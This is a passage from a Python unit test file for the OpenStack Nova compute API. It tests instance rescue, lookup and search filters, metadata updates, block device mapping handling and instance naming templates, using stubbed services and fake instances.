self.assertEqual(inst_ref['task_state'], None)
def fake_rpc_method(context, topic, msg, do_cast=True):
self.assertFalse(do_cast)
self.stubs.Set(rpc, 'call', fake_rpc_method)
self.compute_api.set_admin_password(self.context, inst_ref)
inst_ref = db.instance_get_by_uuid(self.context, instance_uuid)
self.assertEqual(inst_ref['vm_state'], vm_states.ACTIVE)
self.assertEqual(inst_ref['task_state'],
task_states.UPDATING_PASSWORD)
self.compute.terminate_instance(self.context,
instance=jsonutils.to_primitive(inst_ref))
def test_rescue_unrescue(self):
instance = jsonutils.to_primitive(self._create_fake_instance())
instance_uuid = instance['uuid']
self.compute.run_instance(self.context, instance=instance)
instance = db.instance_get_by_uuid(self.context, instance_uuid)
self.assertEqual(instance['vm_state'], vm_states.ACTIVE)
self.assertEqual(instance['task_state'], None)
self.compute_api.rescue(self.context, instance)
instance = db.instance_get_by_uuid(self.context, instance_uuid)
self.assertEqual(instance['vm_state'], vm_states.ACTIVE)
self.assertEqual(instance['task_state'], task_states.RESCUING)
params = {'vm_state': vm_states.RESCUED, 'task_state': None}
db.instance_update(self.context, instance_uuid, params)
instance = db.instance_get_by_uuid(self.context, instance_uuid)
self.compute_api.unrescue(self.context, instance)
instance = db.instance_get_by_uuid(self.context, instance_uuid)
self.assertEqual(instance['vm_state'], vm_states.RESCUED)
self.assertEqual(instance['task_state'], task_states.UNRESCUING)
self.compute.terminate_instance(self.context,
instance=jsonutils.to_primitive(instance))
def test_rescue_volume_backed(self):
# Instance started without an image
volume_backed_inst_1 = jsonutils.to_primitive(
self._create_fake_instance({'image_ref': ''}))
# Instance started with a placeholder image (for metadata)
volume_backed_inst_2 = jsonutils.to_primitive(
self._create_fake_instance(
{'image_ref': 'my_placeholder_img',
'root_device_name': '/dev/vda'})
)
def fake_get_instance_bdms(*args, **kwargs):
return [{'device_name': '/dev/vda',
'source_type': 'volume',
'boot_index': 0,
'destination_type': 'volume',
'volume_id': 'bf0b6b00-a20c-11e2-9e96-0800200c9a66'}]
self.stubs.Set(self.compute_api, 'get_instance_bdms',
fake_get_instance_bdms)
def fake_volume_get(self, context, volume_id):
return {'id': volume_id, 'status': 'in-use'}
self.stubs.Set(cinder.API, 'get', fake_volume_get)
self.compute.run_instance(self.context,
instance=volume_backed_inst_1)
self.compute.run_instance(self.context,
instance=volume_backed_inst_2)
self.assertRaises(exception.InstanceNotRescuable,
self.compute_api.rescue, self.context,
volume_backed_inst_1)
self.assertRaises(exception.InstanceNotRescuable,
self.compute_api.rescue, self.context,
volume_backed_inst_2)
self.compute.terminate_instance(self.context,
instance=jsonutils.to_primitive(volume_backed_inst_1))
self.compute.terminate_instance(self.context,
instance=jsonutils.to_primitive(volume_backed_inst_2))
def test_get(self):
# Test get instance.
exp_instance = self._create_fake_instance()
# NOTE(danms): Transform the db object in a similar way as
# the API method will do.
expected = obj_base.obj_to_primitive(
instance_obj.Instance._from_db_object(
self.context, instance_obj.Instance(), exp_instance,
instance_obj.INSTANCE_DEFAULT_FIELDS + ['fault']))
def fake_db_get(_context, _instance_uuid, columns_to_join=None):
return exp_instance
self.stubs.Set(db, 'instance_get_by_uuid', fake_db_get)
instance = self.compute_api.get(self.context, exp_instance['uuid'])
self.assertEquals(unify_instance(expected),
unify_instance(instance))
def test_get_with_admin_context(self):
# Test get instance.
c = context.get_admin_context()
exp_instance = self._create_fake_instance()
# NOTE(danms): Transform the db object in a similar way as
# the API method will do.
expected = obj_base.obj_to_primitive(
instance_obj.Instance._from_db_object(
c, instance_obj.Instance(), exp_instance,
instance_obj.INSTANCE_DEFAULT_FIELDS + ['fault']))
def fake_db_get(context, instance_uuid, columns_to_join=None):
return exp_instance
self.stubs.Set(db, 'instance_get_by_uuid', fake_db_get)
instance = self.compute_api.get(c, exp_instance['uuid'])
self.assertEquals(unify_instance(expected),
unify_instance(instance))
def test_get_with_integer_id(self):
# Test get instance with an integer id.
exp_instance = self._create_fake_instance()
# NOTE(danms): Transform the db object in a similar way as
# the API method will do.
expected = obj_base.obj_to_primitive(
instance_obj.Instance._from_db_object(
self.context, instance_obj.Instance(), exp_instance,
instance_obj.INSTANCE_DEFAULT_FIELDS + ['fault']))
def fake_db_get(_context, _instance_id, columns_to_join=None):
return exp_instance
self.stubs.Set(db, 'instance_get', fake_db_get)
instance = self.compute_api.get(self.context, exp_instance['id'])
self.assertEquals(unify_instance(expected),
unify_instance(instance))
def test_get_all_by_name_regexp(self):
# Test searching instances by name (display_name).
c = context.get_admin_context()
instance1 = self._create_fake_instance({'display_name': 'woot'})
instance2 = self._create_fake_instance({
'display_name': 'woo'})
instance3 = self._create_fake_instance({
'display_name': 'not-woot'})
instances = self.compute_api.get_all(c,
search_opts={'name': '^woo.*'})
self.assertEqual(len(instances), 2)
instance_uuids = [instance['uuid'] for instance in instances]
self.assertTrue(instance1['uuid'] in instance_uuids)
self.assertTrue(instance2['uuid'] in instance_uuids)
instances = self.compute_api.get_all(c,
search_opts={'name': '^woot.*'})
instance_uuids = [instance['uuid'] for instance in instances]
self.assertEqual(len(instances), 1)
self.assertTrue(instance1['uuid'] in instance_uuids)
instances = self.compute_api.get_all(c,
search_opts={'name': '.*oot.*'})
self.assertEqual(len(instances), 2)
instance_uuids = [instance['uuid'] for instance in instances]
self.assertTrue(instance1['uuid'] in instance_uuids)
self.assertTrue(instance3['uuid'] in instance_uuids)
instances = self.compute_api.get_all(c,
search_opts={'name': '^n.*'})
self.assertEqual(len(instances), 1)
instance_uuids = [instance['uuid'] for instance in instances]
self.assertTrue(instance3['uuid'] in instance_uuids)
instances = self.compute_api.get_all(c,
search_opts={'name': 'noth.*'})
self.assertEqual(len(instances), 0)
db.instance_destroy(c, instance1['uuid'])
db.instance_destroy(c, instance2['uuid'])
db.instance_destroy(c, instance3['uuid'])
def test_get_all_by_multiple_options_at_once(self):
# Test searching by multiple options at once.
c = context.get_admin_context()
network_manager = fake_network.FakeNetworkManager()
self.stubs.Set(self.compute_api.network_api,
'get_instance_uuids_by_ip_filter',
network_manager.get_instance_uuids_by_ip_filter)
instance1 = self._create_fake_instance({
'display_name': 'woot',
'id': 1,
'uuid': '00000000-0000-0000-0000-000000000010'})
instance2 = self._create_fake_instance({
'display_name': 'woo',
'id': 20,
'uuid': '00000000-0000-0000-0000-000000000020'})
instance3 = self._create_fake_instance({
'display_name': 'not-woot',
'id': 30,
'uuid': '00000000-0000-0000-0000-000000000030'})
# ip ends up matching 2nd octet here.. so all 3 match ip
# but 'name' only matches one
instances = self.compute_api.get_all(c,
search_opts={'ip': '.*\.1', 'name': 'not.*'})
self.assertEqual(len(instances), 1)
self.assertEqual(instances[0]['uuid'], instance3['uuid'])
# ip ends up matching any ip with a '1' in the last octet..
# so instance 1 and 3.. but name should only match #1
# but 'name' only matches one
instances = self.compute_api.get_all(c,
search_opts={'ip': '.*\.1$', 'name': '^woo.*'})
self.assertEqual(len(instances), 1)
self.assertEqual(instances[0]['uuid'], instance1['uuid'])
# same as above but no match on name (name matches instance1
# but the ip query doesn't
instances = self.compute_api.get_all(c,
search_opts={'ip': '.*\.2$', 'name': '^woot.*'})
self.assertEqual(len(instances), 0)
# ip matches all 3... ipv6 matches #2+#3...name matches #3
instances = self.compute_api.get_all(c,
search_opts={'ip': '.*\.1',
'name': 'not.*',
'ip6': '^.*12.*34.*'})
self.assertEqual(len(instances), 1)
self.assertEqual(instances[0]['uuid'], instance3['uuid'])
db.instance_destroy(c, instance1['uuid'])
db.instance_destroy(c, instance2['uuid'])
db.instance_destroy(c, instance3['uuid'])
def test_get_all_by_image(self):
# Test searching instances by image.
c = context.get_admin_context()
instance1 = self._create_fake_instance({'image_ref': '1234'})
instance2 = self._create_fake_instance({'image_ref': '4567'})
instance3 = self._create_fake_instance({'image_ref': '4567'})
instances = self.compute_api.get_all(c, search_opts={'image': '123'})
self.assertEqual(len(instances), 0)
instances = self.compute_api.get_all(c, search_opts={'image': '1234'})
self.assertEqual(len(instances), 1)
self.assertEqual(instances[0]['uuid'], instance1['uuid'])
instances = self.compute_api.get_all(c, search_opts={'image': '4567'})
self.assertEqual(len(instances), 2)
instance_uuids = [instance['uuid'] for instance in instances]
self.assertTrue(instance2['uuid'] in instance_uuids)
self.assertTrue(instance3['uuid'] in instance_uuids)
# Test passing a list as search arg
instances = self.compute_api.get_all(c,
search_opts={'image': ['1234', '4567']})
self.assertEqual(len(instances), 3)
db.instance_destroy(c, instance1['uuid'])
db.instance_destroy(c, instance2['uuid'])
db.instance_destroy(c, instance3['uuid'])
def test_get_all_by_flavor(self):
# Test searching instances by image.
c = context.get_admin_context()
instance1 = self._create_fake_instance({'instance_type_id': 1})
instance2 = self._create_fake_instance({'instance_type_id': 2})
instance3 = self._create_fake_instance({'instance_type_id': 2})
# NOTE(comstud): Migrations set up the instance_types table
# for us. Therefore, we assume the following is true for
# these tests:
# instance_type_id 1 == flavor 3
# instance_type_id 2 == flavor 1
# instance_type_id 3 == flavor 4
# instance_type_id 4 == flavor 5
# instance_type_id 5 == flavor 2
instances = self.compute_api.get_all(c,
search_opts={'flavor': 5})
self.assertEqual(len(instances), 0)
# ensure unknown filter maps to an exception
self.assertRaises(exception.FlavorNotFound,
self.compute_api.get_all, c,
search_opts={'flavor': 99})
instances = self.compute_api.get_all(c, search_opts={'flavor': 3})
self.assertEqual(len(instances), 1)
self.assertEqual(instances[0]['id'], instance1['id'])
instances = self.compute_api.get_all(c, search_opts={'flavor': 1})
self.assertEqual(len(instances), 2)
instance_uuids = [instance['uuid'] for instance in instances]
self.assertTrue(instance2['uuid'] in instance_uuids)
self.assertTrue(instance3['uuid'] in instance_uuids)
db.instance_destroy(c, instance1['uuid'])
db.instance_destroy(c, instance2['uuid'])
db.instance_destroy(c, instance3['uuid'])
def test_get_all_by_state(self):
# Test searching instances by state.
c = context.get_admin_context()
instance1 = self._create_fake_instance({
'power_state': power_state.SHUTDOWN,
})
instance2 = self._create_fake_instance({
'power_state': power_state.RUNNING,
})
instance3 = self._create_fake_instance({
'power_state': power_state.RUNNING,
})
instances = self.compute_api.get_all(c,
search_opts={'power_state': power_state.SUSPENDED})
self.assertEqual(len(instances), 0)
instances = self.compute_api.get_all(c,
search_opts={'power_state': power_state.SHUTDOWN})
self.assertEqual(len(instances), 1)
self.assertEqual(instances[0]['uuid'], instance1['uuid'])
instances = self.compute_api.get_all(c,
search_opts={'power_state': power_state.RUNNING})
self.assertEqual(len(instances), 2)
instance_uuids = [instance['uuid'] for instance in instances]
self.assertTrue(instance2['uuid'] in instance_uuids)
self.assertTrue(instance3['uuid'] in instance_uuids)
# Test passing a list as search arg
instances = self.compute_api.get_all(c,
search_opts={'power_state': [power_state.SHUTDOWN,
power_state.RUNNING]})
self.assertEqual(len(instances), 3)
db.instance_destroy(c, instance1['uuid'])
db.instance_destroy(c, instance2['uuid'])
db.instance_destroy(c, instance3['uuid'])
def test_get_all_by_metadata(self):
# Test searching instances by metadata.
c = context.get_admin_context()
instance0 = self._create_fake_instance()
instance1 = self._create_fake_instance({
'metadata': {'key1': 'value1'}})
instance2 = self._create_fake_instance({
'metadata': {'key2': 'value2'}})
instance3 = self._create_fake_instance({
'metadata': {'key3': 'value3'}})
instance4 = self._create_fake_instance({
'metadata': {'key3': 'value3',
'key4': 'value4'}})
# get all instances
instances = self.compute_api.get_all(c,
search_opts={'metadata': {}})
self.assertEqual(len(instances), 5)
# wrong key/value combination
instances = self.compute_api.get_all(c,
search_opts={'metadata': {'key1': 'value3'}})
self.assertEqual(len(instances), 0)
# non-existing keys
instances = self.compute_api.get_all(c,
search_opts={'metadata': {'key5': 'value1'}})
self.assertEqual(len(instances), 0)
# find existing instance
instances = self.compute_api.get_all(c,
search_opts={'metadata': {'key2': 'value2'}})
self.assertEqual(len(instances), 1)
self.assertEqual(instances[0]['uuid'], instance2['uuid'])
instances = self.compute_api.get_all(c,
search_opts={'metadata': {'key3': 'value3'}})
self.assertEqual(len(instances), 2)
instance_uuids = [instance['uuid'] for instance in instances]
self.assertTrue(instance3['uuid'] in instance_uuids)
self.assertTrue(instance4['uuid'] in instance_uuids)
# multiple criteria as a dict
instances = self.compute_api.get_all(c,
search_opts={'metadata': {'key3': 'value3',
'key4': 'value4'}})
self.assertEqual(len(instances), 1)
self.assertEqual(instances[0]['uuid'], instance4['uuid'])
# multiple criteria as a list
instances = self.compute_api.get_all(c,
search_opts={'metadata': [{'key4': 'value4'},
{'key3': 'value3'}]})
self.assertEqual(len(instances), 1)
self.assertEqual(instances[0]['uuid'], instance4['uuid'])
db.instance_destroy(c, instance0['uuid'])
db.instance_destroy(c, instance1['uuid'])
db.instance_destroy(c, instance2['uuid'])
db.instance_destroy(c, instance3['uuid'])
db.instance_destroy(c, instance4['uuid'])
def test_all_instance_metadata(self):
instance1 = self._create_fake_instance({'metadata': {'key1': 'value1'},
'user_id': 'user1',
'project_id': 'project1'})
instance2 = self._create_fake_instance({'metadata': {'key2': 'value2'},
'user_id': 'user2',
'project_id': 'project2'})
_context = self.context
_context.user_id = 'user1'
_context.project_id = 'project1'
metadata = self.compute_api.get_all_instance_metadata(_context,
search_filts=[])
self.assertTrue(len(metadata) == 1)
self.assertEqual(metadata[0]['key'], 'key1')
_context.user_id = 'user2'
_context.project_id = 'project2'
metadata = self.compute_api.get_all_instance_metadata(_context,
search_filts=[])
self.assertTrue(len(metadata) == 1)
self.assertEqual(metadata[0]['key'], 'key2')
_context = context.get_admin_context()
metadata = self.compute_api.get_all_instance_metadata(_context,
search_filts=[])
self.assertTrue(len(metadata) == 2)
def test_instance_metadata(self):
meta_changes = [None]
self.flags(notify_on_state_change='vm_state')
def fake_change_instance_metadata(inst, ctxt, diff, instance=None,
instance_uuid=None):
meta_changes[0] = diff
self.stubs.Set(compute_rpcapi.ComputeAPI, 'change_instance_metadata',
fake_change_instance_metadata)
_context = context.get_admin_context()
instance = self._create_fake_instance({'metadata': {'key1': 'value1'}})
instance = dict(instance.iteritems())
metadata = self.compute_api.get_instance_metadata(_context, instance)
self.assertEqual(metadata, {'key1': 'value1'})
self.compute_api.update_instance_metadata(_context, instance,
{'key2': 'value2'})
metadata = self.compute_api.get_instance_metadata(_context, instance)
self.assertEqual(metadata, {'key1': 'value1', 'key2': 'value2'})
self.assertEqual(meta_changes, [{'key2': ['+', 'value2']}])
self.assertEquals(len(fake_notifier.NOTIFICATIONS), 1)
msg = fake_notifier.NOTIFICATIONS[0]
payload = msg.payload
self.assertTrue('metadata' in payload)
self.assertEquals(payload['metadata'], metadata)
new_metadata = {'key2': 'bah', 'key3': 'value3'}
self.compute_api.update_instance_metadata(_context, instance,
new_metadata, delete=True)
metadata = self.compute_api.get_instance_metadata(_context, instance)
self.assertEqual(metadata, new_metadata)
self.assertEqual(meta_changes, [{
'key1': ['-'],
'key2': ['+', 'bah'],
'key3': ['+', 'value3'],
}])
self.assertEquals(len(fake_notifier.NOTIFICATIONS), 2)
msg = fake_notifier.NOTIFICATIONS[1]
payload = msg.payload
self.assertTrue('metadata' in payload)
self.assertEquals(payload['metadata'], metadata)
self.compute_api.delete_instance_metadata(_context, instance, 'key2')
metadata = self.compute_api.get_instance_metadata(_context, instance)
self.assertEqual(metadata, {'key3': 'value3'})
self.assertEqual(meta_changes, [{'key2': ['-']}])
self.assertEquals(len(fake_notifier.NOTIFICATIONS), 3)
msg = fake_notifier.NOTIFICATIONS[2]
payload = msg.payload
self.assertTrue('metadata' in payload)
self.assertEquals(payload['metadata'], {})
db.instance_destroy(_context, instance['uuid'])
def test_disallow_metadata_changes_during_building(self):
def fake_change_instance_metadata(inst, ctxt, diff, instance=None,
instance_uuid=None):
pass
self.stubs.Set(compute_rpcapi.ComputeAPI, 'change_instance_metadata',
fake_change_instance_metadata)
instance = self._create_fake_instance({'vm_state': vm_states.BUILDING})
instance = dict(instance)
self.assertRaises(exception.InstanceInvalidState,
self.compute_api.delete_instance_metadata, self.context,
instance, "key")
self.assertRaises(exception.InstanceInvalidState,
self.compute_api.update_instance_metadata, self.context,
instance, "key")
def test_get_instance_faults(self):
# Get an instances latest fault.
instance = self._create_fake_instance()
fault_fixture = {
'code': 404,
'instance_uuid': instance['uuid'],
'message': "HTTPNotFound",
'details': "Stock details for test",
'created_at': datetime.datetime(2010, 10, 10, 12, 0, 0),
}
def return_fault(_ctxt, instance_uuids):
return dict.fromkeys(instance_uuids, [fault_fixture])
self.stubs.Set(nova.db,
'instance_fault_get_by_instance_uuids',
return_fault)
_context = context.get_admin_context()
output = self.compute_api.get_instance_faults(_context, [instance])
expected = {instance['uuid']: [fault_fixture]}
self.assertEqual(output, expected)
db.instance_destroy(_context, instance['uuid'])
@staticmethod
def _parse_db_block_device_mapping(bdm_ref):
attr_list = ('delete_on_termination', 'device_name', 'no_device',
'virtual_name', 'volume_id', 'volume_size', 'snapshot_id')
bdm = {}
for attr in attr_list:
val = bdm_ref.get(attr, None)
if val:
bdm[attr] = val
return bdm
def test_update_block_device_mapping(self):
swap_size = ephemeral_size = 1
instance_type = {'swap': swap_size, 'ephemeral_gb': ephemeral_size}
instance = self._create_fake_instance()
mappings = [
{'virtual': 'ami', 'device': 'sda1'},
{'virtual': 'root', 'device': '/dev/sda1'},
{'virtual': 'swap', 'device': 'sdb4'},
{'virtual': 'swap', 'device': 'sdb3'},
{'virtual': 'swap', 'device': 'sdb2'},
{'virtual': 'swap', 'device': 'sdb1'},
{'virtual': 'ephemeral0', 'device': 'sdc1'},
{'virtual': 'ephemeral1', 'device': 'sdc2'},
{'virtual': 'ephemeral2', 'device': 'sdc3'}]
block_device_mapping = [
# root
{'device_name': '/dev/sda1',
'source_type': 'snapshot', 'destination_type': 'volume',
'snapshot_id': '00000000-aaaa-bbbb-cccc-000000000000',
'delete_on_termination': False},
# overwrite swap
{'device_name': '/dev/sdb2',
'source_type': 'snapshot', 'destination_type': 'volume',
'snapshot_id': '11111111-aaaa-bbbb-cccc-111111111111',
'delete_on_termination': False},
{'device_name': '/dev/sdb3',
'source_type': 'snapshot', 'destination_type': 'volume',
'snapshot_id': '22222222-aaaa-bbbb-cccc-222222222222'},
{'device_name': '/dev/sdb4',
'no_device': True},
# overwrite ephemeral
{'device_name': '/dev/sdc1',
'source_type': 'snapshot', 'destination_type': 'volume',
'snapshot_id': '33333333-aaaa-bbbb-cccc-333333333333',
'delete_on_termination': False},
{'device_name': '/dev/sdc2',
'source_type': 'snapshot', 'destination_type': 'volume',
'snapshot_id': '33333333-aaaa-bbbb-cccc-444444444444',
'delete_on_termination': False},
{'device_name': '/dev/sdc3',
'source_type': 'snapshot', 'destination_type': 'volume',
'snapshot_id': '44444444-aaaa-bbbb-cccc-555555555555'},
{'device_name': '/dev/sdc4',
'no_device': True},
# volume
{'device_name': '/dev/sdd1',
'source_type': 'snapshot', 'destination_type': 'volume',
'snapshot_id': '55555555-aaaa-bbbb-cccc-666666666666',
'delete_on_termination': False},
{'device_name': '/dev/sdd2',
'source_type': 'snapshot', 'destination_type': 'volume',
'snapshot_id': '66666666-aaaa-bbbb-cccc-777777777777'},
{'device_name': '/dev/sdd3',
'source_type': 'snapshot', 'destination_type': 'volume',
'snapshot_id': '77777777-aaaa-bbbb-cccc-888888888888'},
{'device_name': '/dev/sdd4',
'no_device': True}]
image_mapping = self.compute_api._prepare_image_mapping(
instance_type, instance['uuid'], mappings)
self.compute_api._update_block_device_mapping(
self.context, instance_type, instance['uuid'], image_mapping)
bdms = [block_device.BlockDeviceDict(bdm) for bdm in
db.block_device_mapping_get_all_by_instance(
self.context, instance['uuid'])]
expected_result = [
{'source_type': 'blank', 'destination_type': 'local',
'guest_format': 'swap', 'device_name': '/dev/sdb1',
'volume_size': swap_size, 'delete_on_termination': True},
{'source_type': 'blank', 'destination_type': 'local',
'guest_format': CONF.default_ephemeral_format,
'device_name': '/dev/sdc3', 'delete_on_termination': True},
{'source_type': 'blank', 'destination_type': 'local',
'guest_format': CONF.default_ephemeral_format,
'device_name': '/dev/sdc1', 'delete_on_termination': True},
{'source_type': 'blank', 'destination_type': 'local',
'guest_format': CONF.default_ephemeral_format,
'device_name': '/dev/sdc2', 'delete_on_termination': True},
]
bdms.sort(key=operator.itemgetter('device_name'))
expected_result.sort(key=operator.itemgetter('device_name'))
self.assertEqual(len(bdms), len(expected_result))
for expected, got in zip(expected_result, bdms):
self.assertThat(expected, matchers.IsSubDictOf(got))
self.compute_api._update_block_device_mapping(
self.context, flavors.get_default_flavor(),
instance['uuid'], block_device_mapping)
bdms = [block_device.BlockDeviceDict(bdm) for bdm in
db.block_device_mapping_get_all_by_instance(
self.context, instance['uuid'])]
expected_result = [
{'snapshot_id': '00000000-aaaa-bbbb-cccc-000000000000',
'device_name': '/dev/sda1'},
{'source_type': 'blank', 'destination_type': 'local',
'guest_format': 'swap', 'device_name': '/dev/sdb1',
'volume_size': swap_size, 'delete_on_termination': True},
{'device_name': '/dev/sdb2',
'source_type': 'snapshot', 'destination_type': 'volume',
'snapshot_id': '11111111-aaaa-bbbb-cccc-111111111111',
'delete_on_termination': False},
{'device_name': '/dev/sdb3',
'source_type': 'snapshot', 'destination_type': 'volume',
'snapshot_id': '22222222-aaaa-bbbb-cccc-222222222222'},
{'device_name': '/dev/sdb4', 'no_device': True},
{'device_name': '/dev/sdc1',
'source_type': 'snapshot', 'destination_type': 'volume',
'snapshot_id': '33333333-aaaa-bbbb-cccc-333333333333',
'delete_on_termination': False},
{'device_name': '/dev/sdc2',
'source_type': 'snapshot', 'destination_type': 'volume',
'snapshot_id': '33333333-aaaa-bbbb-cccc-444444444444',
'delete_on_termination': False},
{'device_name': '/dev/sdc3',
'source_type': 'snapshot', 'destination_type': 'volume',
'snapshot_id': '44444444-aaaa-bbbb-cccc-555555555555'},
{'no_device': True, 'device_name': '/dev/sdc4'},
{'device_name': '/dev/sdd1',
'source_type': 'snapshot', 'destination_type': 'volume',
'snapshot_id': '55555555-aaaa-bbbb-cccc-666666666666',
'delete_on_termination': False},
{'device_name': '/dev/sdd2',
'source_type': 'snapshot', 'destination_type': 'volume',
'snapshot_id': '66666666-aaaa-bbbb-cccc-777777777777'},
{'device_name': '/dev/sdd3',
'source_type': 'snapshot', 'destination_type': 'volume',
'snapshot_id': '77777777-aaaa-bbbb-cccc-888888888888'},
{'no_device': True, 'device_name': '/dev/sdd4'}]
bdms.sort(key=operator.itemgetter('device_name'))
expected_result.sort(key=operator.itemgetter('device_name'))
self.assertEqual(len(bdms), len(expected_result))
for expected, got in zip(expected_result, bdms):
self.assertThat(expected, matchers.IsSubDictOf(got))
for bdm in db.block_device_mapping_get_all_by_instance(
self.context, instance['uuid']):
db.block_device_mapping_destroy(self.context, bdm['id'])
instance = db.instance_get_by_uuid(self.context, instance['uuid'])
self.compute.terminate_instance(self.context,
jsonutils.to_primitive(instance))
def test_check_and_transform_bdm(self):
base_options = {'root_device_name': 'vdb',
'image_ref': FAKE_IMAGE_REF}
fake_legacy_bdms = [
{'device_name': '/dev/vda',
'volume_id': '33333333-aaaa-bbbb-cccc-333333333333',
'delete_on_termination': False}]
# We get an image BDM
transformed_bdm = self.compute_api._check_and_transform_bdm(
base_options, 1, 1, fake_legacy_bdms, True)
self.assertEqual(len(transformed_bdm), 2)
# No image BDM created
base_options['root_device_name'] = 'vda'
transformed_bdm = self.compute_api._check_and_transform_bdm(
base_options, 1, 1, fake_legacy_bdms, True)
self.assertEqual(len(transformed_bdm), 1)
# Volumes with multiple instances fails
self.assertRaises(exception.InvalidRequest,
self.compute_api._check_and_transform_bdm,
base_options, 1, 2, fake_legacy_bdms, True)
checked_bdm = self.compute_api._check_and_transform_bdm(
base_options, 1, 1, transformed_bdm, True)
self.assertEqual(checked_bdm, transformed_bdm)
def test_volume_size(self):
ephemeral_size = 2
swap_size = 3
volume_size = 5
swap_bdm = {'source_type': 'blank', 'guest_format': 'swap'}
ephemeral_bdm = {'source_type': 'blank', 'guest_format': None}
volume_bdm = {'source_type': 'volume', 'volume_size': volume_size}
inst_type = {'ephemeral_gb': ephemeral_size, 'swap': swap_size}
self.assertEqual(
self.compute_api._volume_size(inst_type, ephemeral_bdm),
ephemeral_size)
ephemeral_bdm['volume_size'] = 42
self.assertEqual(
self.compute_api._volume_size(inst_type, ephemeral_bdm), 42)
self.assertEqual(
self.compute_api._volume_size(inst_type, swap_bdm),
swap_size)
swap_bdm['volume_size'] = 42
self.assertEqual(
self.compute_api._volume_size(inst_type, swap_bdm), 42)
self.assertEqual(
self.compute_api._volume_size(inst_type, volume_bdm),
volume_size)
def test_is_volume_backed_instance(self):
ctxt = self.context
instance = self._create_fake_instance({'image_ref': ''})
self.assertTrue(
self.compute_api.is_volume_backed_instance(ctxt, instance, None))
instance = self._create_fake_instance({'root_device_name': 'vda'})
self.assertFalse(
self.compute_api.is_volume_backed_instance(ctxt, instance, []))
bdms = [{'device_name': '/dev/vda',
'volume_id': 'fake_volume_id',
'boot_index': 0,
'destination_type': 'volume'}]
self.assertTrue(
self.compute_api.is_volume_backed_instance(ctxt, instance, bdms))
bdms = [{'device_name': '/dev/vda',
'volume_id': 'fake_volume_id',
'destination_type': 'local',
'boot_index': 0,
'snapshot_id': None},
{'device_name': '/dev/vdb',
'boot_index': 1,
'destination_type': 'volume',
'volume_id': 'c2ec2156-d75e-11e2-985b-5254009297d6',
'snapshot_id': None}]
self.assertFalse(
self.compute_api.is_volume_backed_instance(ctxt, instance, bdms))
bdms = [{'device_name': '/dev/vda',
'snapshot_id': 'de8836ac-d75e-11e2-8271-5254009297d6',
'destination_type': 'volume',
'boot_index': 0,
'volume_id': None}]
self.assertTrue(
self.compute_api.is_volume_backed_instance(ctxt, instance, bdms))
def test_is_volume_backed_instance_no_bdms(self):
ctxt = self.context
instance = self._create_fake_instance()
self.mox.StubOutWithMock(self.compute_api, 'get_instance_bdms')
self.compute_api.get_instance_bdms(ctxt, instance,
legacy=False).AndReturn([])
self.mox.ReplayAll()
self.compute_api.is_volume_backed_instance(ctxt, instance, None)
def test_reservation_id_one_instance(self):
"""Verify building an instance has a reservation_id that
matches return value from create.
"""
(refs, resv_id) = self.compute_api.create(self.context,
flavors.get_default_flavor(), image_href='some-fake-image')
try:
self.assertEqual(len(refs), 1)
self.assertEqual(refs[0]['reservation_id'], resv_id)
finally:
db.instance_destroy(self.context, refs[0]['uuid'])
def test_reservation_ids_two_instances(self):
"""Verify building 2 instances at once results in a
reservation_id being returned equal to reservation id set
in both instances.
"""
(refs, resv_id) = self.compute_api.create(self.context,
flavors.get_default_flavor(), image_href='some-fake-image',
min_count=2, max_count=2)
try:
self.assertEqual(len(refs), 2)
self.assertNotEqual(resv_id, None)
finally:
for instance in refs:
self.assertEqual(instance['reservation_id'], resv_id)
db.instance_destroy(self.context, refs[0]['uuid'])
def test_multi_instance_display_name_template(self):
self.flags(multi_instance_display_name_template='%(name)s')
(refs, resv_id) = self.compute_api.create(self.context,
flavors.get_default_flavor(), image_href='some-fake-image',
min_count=2, max_count=2, display_name='x')
self.assertEqual(refs[0]['display_name'], 'x')
self.assertEqual(refs[0]['hostname'], 'x')
self.assertEqual(refs[1]['display_name'], 'x')
self.assertEqual(refs[1]['hostname'], 'x')
self.flags(multi_instance_display_name_template='%(name)s-%(count)s')
(refs, resv_id) = self.compute_api.create(self.context,
flavors.get_default_flavor(), image_href='some-fake-image',
min_count=2, max_count=2, display_name='x')
self.assertEqual(refs[0]['display_name'], 'x-1')
self.assertEqual(refs[0]['hostname'], 'x-1')
self.assertEqual(refs[1]['display_name'], 'x-2')
self.assertEqual(refs[1]['hostname'], 'x-2')
self.flags(multi_instance_display_name_template='%(name)s-%(uuid)s')
(refs, resv_id) = self.compute_api.create(self.context,
flavors.get_default_flavor(), image_href='some-fake-image',
min_count=2, max_count=2, display_name='x')
self.assertEqual(refs[0]['display_name'], 'x-%s' % refs[0]['uuid'])
self.assertEqual(refs[0]['hostname'], 'x-%s' % refs[0]['uuid'])
self.assertEqual(refs[1]['display_name'], 'x-%s' % refs[1]['uuid'])
self.assertEqual(refs[1]['hostname'], 'x-%s' % refs[1]['uuid'])
def test_instance_architecture(self):
# Test the instance architecture.
i_ref = self._create_fake_instance()
self.assertEqual(i_ref['architecture'], 'x86_64')
db.instance_destroy(self.context, i_ref['uuid'])
def test_instance_unknown_architecture(self):
# Test if the architecture is unknown.
instance = jsonutils.to_primitive(self._create_fake_instance(
params={'architecture': ''}))
try:
self.compute.run_instance(self.context, instance=instance)
instance = db.instance_get_by_uuid(self.context,
instance['uuid'])
self.assertNotEqual(instance['architecture'], 'Unknown')
finally:
db.instance_destroy(self.context, instance['uuid'])
def test_instance_name_template(self):
# Test the instance_name template.
self.flags(instance_name_template='instance-%d')
i_ref = self._create_fake_instance()
self.assertEqual(i_ref['name'], 'instance-%d' % i_ref['id'])
db.instance_destroy(self.context, i_ref['uuid'])
self.flags(instance_name_template='instance-%(uuid)s')
i_ref = self._create_fake_instance()
self.assertEqual(i_ref['name'], 'instance-%s' % i_ref['uuid'])
db.instance_destroy(self.context, i_ref['uuid'])
self.flags(instance_name_template='%(id)d-%(uuid)s')
i_ref = self._create_fake_instance()
self.assertEqual(i_ref['name'], '%d-%s' %
(i_ref['id'], i_ref['uuid']))
db.instance_destroy(self.context, i_ref['uuid'])
# not allowed.. default is uuid
self.flags(instance_name_template='%(name)s')
i_ref = self._create_fake_instance()
self.assertEqual(i_ref['name'], i_ref['uuid'])
db.instance_destroy(self.context, i_ref['uuid'])
def test_add_remove_fixed_ip(self):
instance = self._create_fake_instance(params={'host': CONF.host})
self.stubs.Set(self.compute_api.network_api, 'deallocate_for_instance',
lambda *a, **kw: None)
self.compute_api.add_fixed_ip(self.context, instance, '1')
self.compute_api.remove_fixed_ip(self.context, instance, '192.168.1.1')
self.compute_api.delete(self.context, self._objectify(instance))
